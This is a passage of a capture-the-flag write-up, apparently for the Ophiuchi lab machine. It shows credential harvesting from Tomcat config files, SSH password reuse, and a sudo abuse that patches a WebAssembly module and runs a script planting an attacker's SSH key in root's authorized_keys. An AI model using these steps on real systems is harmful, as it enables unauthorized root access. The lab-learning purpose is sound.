4 privesc
Tomcat config files are located under $TOMCAT_HOME/conf/
tomcat@ophiuchi:~/conf$ grep -rnw . -ie password --color=auto --color=always 2>/dev/null
<ie password --color=auto --color=always 2>/dev/null
./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
./tomcat-users.xml:26: you must define such a user - the username and password are arbitrary. It is
./tomcat-users.xml:41: <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
./tomcat-users.xml:42: <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
./tomcat-users.xml:43: <user username="role1" password="<must-be-changed>" roles="role1"/>
./tomcat-users.xsd:45: <xs:attribute name="password" type="xs:string" />
./tomcat-users.xml:22:<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
We can try SSH using admin:whythereisalimit
$ ssh admin@10.10.10.227
admin@ophiuchi:~$ whoami;id
admin
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
admin@ophiuchi:/opt/wasm-functions$ ls -la
total 3928
drwxr-xr-x 3 root root 4096 Oct 14 2020 .
drwxr-xr-x 5 root root 4096 Oct 14 2020 ..
drwxr-xr-x 2 root root 4096 Oct 14 2020 backup
-rw-r--r-- 1 root root 88 Oct 14 2020 deploy.sh
-rwxr-xr-x 1 root root 2516736 Oct 14 2020 index
-rw-rw-r-- 1 root root 522 Oct 14 2020 index.go
-rwxrwxr-x 1 root root 1479371 Oct 14 2020 main.wasm
admin@ophiuchi:/opt/wasm-functions$ cat index.go
package main
import (
"fmt"
wasm "github.com/wasmerio/wasmer-go/wasmer"
"os/exec"
"log"
)
func main() {
bytes, _ := wasm.ReadBytes("main.wasm")
instance, _ := wasm.NewInstance(bytes)
defer instance.Close()
init := instance.Exports["info"]
result,_ := init()
f := result.String()
if (f != "1") {
fmt.Println("Not ready to deploy")
} else {
fmt.Println("Ready to deploy")
out, err := exec.Command("/bin/sh", "deploy.sh").Output()
if err != nil {
log.Fatal(err)
}
fmt.Println(string(out))
}
}
Searching online came across WebAssemblyToolkit (https://github.com/WebAssembly/wabt)
Using this we can change main.wasm to readable formats (wat)
https://developer.mozilla.org/en-US/docs/WebAssembly/Understanding_the_text_format
Using wasm2wat
$ wasm2wat main.wasm -o main.wat
(module
(type (;0;) (func (result i32)))
(func $info (type 0) (result i32) i32.const 0)
(table (;0;) 1 1 funcref)
(memory (;0;) 16)
(global (;0;) (mut i32) (i32.const 1048576))
(global (;1;) i32 (i32.const 1048576))
(global (;2;) i32 (i32.const 1048576))
(export "memory" (memory 0))
(export "info" (func $info))
(export "__data_end" (global 1))
(export "__heap_base" (global 2)))
(func $info (type 0) (result i32) i32.const 0)
shows function info returns a const 0 > changing it to 1
(func $info (type 0) (result i32) i32.const 1)
# converting back to wasm format
$ wat2wasm main.wat -o main.wasm
# file: deploy.sh
#!/bin/bash
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmqb255DdKZBq3Wmr+T97/PP59bthxaIVAxbgRvjOd3HuFT28oMTaPx80lpA1A/dGD8AtBIoIPby23eyrW9zeUVwccQL/eb2+j2yjRxZx/mj/NFwpPUXp5sJTqC+dm3CScuNDDP5TGsy7wvvJbA9twqaSy7OxpO8fpPlHHwJqV1pVQ7VRRxwK6Fx/1x6VkOCkqsBOwL29mfU6PmMfi96yxDHAbMz6ib6xwnFsy8N+KOEX3L+U02TmGMSEUKr45xoIeMI9kaSIzNkPXilLbw7xrYDQZmwyuLNqsUEUy6haawVLUFAo98xY854AxVkLdoHTqZG/GVYlAQIKhzgVop9105VN4JRBU3CayP/9QLTLr+Ho1BDv7pyye9sSWXxZj8mVha9B2v7UPxUMm8nGlV51rrsgShCccDw3wVCKblsD1k+l5Uv5SuCP/cWnSrvsfZT+CsABpa3O36UTmtwhCmunmvchTnO7XAmDlffDaXMXpWubuDoHEtSWPT4ePqEODX3U= kashz@kali" > /root/.ssh/authorized_keys
echo "Copy Success"
# copy both files back
admin@ophiuchi:/tmp$ chmod 755 main.wasm
admin@ophiuchi:/tmp$ chmod 777 deploy.sh
admin@ophiuchi:/tmp$ export PATH="/tmp:$PATH"
admin@ophiuchi:/tmp$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
Copy Success
$ ssh -i id_rsa root@10.10.10.227
root@ophiuchi:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated